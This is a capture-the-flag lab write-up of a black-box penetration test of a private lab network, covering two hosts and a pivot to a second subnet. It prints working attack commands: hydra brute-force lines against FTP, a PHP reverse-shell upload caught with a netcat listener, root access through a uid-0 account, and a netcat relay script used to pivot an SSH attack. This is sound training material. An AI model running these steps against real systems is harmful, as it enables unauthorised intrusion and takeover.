Black Box Test #3

You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine.

Prework

Connect to VPN

sudo openvpn black-box-penetration-test-3.ovpn

Scan network

sudo nmap -sn 172.16.37.0/24 -oN hostAlive.nmap &&
cat hostAlive.nmap | grep for | awk {'print $5'} > ips.txt &&
sudo nmap   -iL ips.txt -A --open -oX portScan.xml &&
nmap2md.sh portScan.xml | xclip

Scanner

Generated on Sun Jul 18 11:53:14 2021 with nmap 7.91.

nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open -oX portScan.xml

Hosts Alive (2)

Host
OS
Accuracy

172.16.37.220

Linux 3.11 - 4.1

95%

172.16.37.234

Linux 3.11 - 4.1

95%

Open Ports and Running Services

✔️172.16.37.220 (Linux 3.11 - 4.1 - 95%)

Port
State
Service
Version

80/tcp

open

http

Apache httpd 2.4.18

3307/tcp

open

tcpwrapped

  • Target URL: http://172.16.37.220

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Found relevant information at view-source:http://172.16.37.220/****

This discovers a new IP in a new network: 172.16.50.222

<!--ens192    Link encap:Ethernet  HWaddr 00:50:56:a0:9c:e3  
          inet addr:172.16.37.220  Bcast:172.16.37.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fea0:9ce3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:720452 errors:0 dropped:32 overruns:0 frame:0
          TX packets:590197 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:108309918 (108.3 MB)  TX bytes:93850516 (93.8 MB)

ens224    Link encap:Ethernet  HWaddr 00:50:56:a0:90:a2  
          inet addr:172.16.50.222  Bcast:172.16.50.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fea0:90a2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:36 errors:0 dropped:20 overruns:0 frame:0
          TX packets:48 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3922 (3.9 KB)  TX bytes:5611 (5.6 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:18699 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18699 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:1417948 (1.4 MB)  TX bytes:1417948 (1.4 MB)

-->

✔️172.16.37.234 (Linux 3.11 - 4.1 - 95%)

Port
State
Service
Version

40121/tcp

open

ftp

ProFTPD 1.3.0a

40180/tcp

open

http

Apache httpd 2.4.18

  • Target URL: http://172.16.37.234:40180

  • File Extension: *

  • File with list of dirs/files: /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

Dirbuster found the following url: http://172.16.37.234:40180/xyz/

This is the content, which discovers a new IP in a new network: 172.16.50.224

<!-- cmd: --><hr />ens192    Link encap:Ethernet  HWaddr 00:50:56:a0:88:b6  
          inet addr:172.16.37.234  Bcast:172.16.37.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fea0:88b6/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2038265 errors:0 dropped:23 overruns:0 frame:0
          TX packets:1588929 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:284381733 (284.3 MB)  TX bytes:245921592 (245.9 MB)

ens224    Link encap:Ethernet  HWaddr 00:50:56:a0:09:4d  
          inet addr:172.16.50.224  Bcast:172.16.50.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fea0:94d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:52 errors:0 dropped:13 overruns:0 frame:0
          TX packets:30 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5703 (5.7 KB)  TX bytes:4104 (4.1 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:194609 errors:0 dropped:0 overruns:0 frame:0
          TX packets:194609 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:16100124 (16.1 MB)  TX bytes:16100124 (16.1 MB)

ftp splash screen suggests to login with 'ftpuser' while trying to connect.

ftp 172.16.37.234 40121 
Connected to 172.16.37.234.
220 ProFTPD 1.3.0a Server (ProFTPD Default Installation. Please use 'ftpuser' to log in.) [172.16.37.234]
Name (172.16.37.234:kali): ftpuser
hydra -t 30 -l ftpuser -P /usr/share/amass/wordlists/all.txt ftp://172.16.37.234:40121

Found credentials for ftp server through hydra: ftpuser/ftpuser

Now that we have access to the ftp, we can upload a PHP reverse shell, and invoke it by opening this URL in your browser: http://172.16.37.234:40180/xyz/rev-shell.php****

nc -l 1234

ftpuser has root rights (just use the same password):

ftpuser:x:0:0::/home/ftpuser:/bin/bash
www-data@xubuntu:/home/ftpuser$ su ftpuser
Password: 
root@xubuntu:~# root@xubuntu:/# find . | grep .flag.txt
find: ‘./run/user/108/gvfs’: Permission denied
./var/www/.flag.txt
./home/ftpuser/.flag.txt

Flag encountered!

root@xubuntu:/# cat /var/www/.flag.txt
You got the first machine!

We run nmap from this new machine to discover opened ports on 172.16.50.224

nmap 172.16.50.222 -sV -n -v -Pn -p- -T4 -oX portScan.xml

Use netcat to pivot an hydra attack for the ssh service on 172.16.50.222 :

#!/bin/bash
# Listener Relay

cd /tmp; mknod backpipex p
while true; do
    nc -lvp 111 0<backpipex | nc -lvp 222 | tee backpipex
done;

Flag encountered for 172.16.50.222!

root/root, just login from your attacker machine:

> ssh root@127.0.0.1 -p 222
root@127.0.0.1's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

199 packages can be updated.
11 updates are security updates.

Last login: Sun Jul 18 22:14:47 2021 from 172.16.50.224

root@xubuntu:~# find / | grep flag.txt
find: ‘/run/user/108/gvfs’: Permission denied
/root/.flag.txt

root@xubuntu:~# cat /root/.flag.txt
Congratz! You got it.

References

Last updated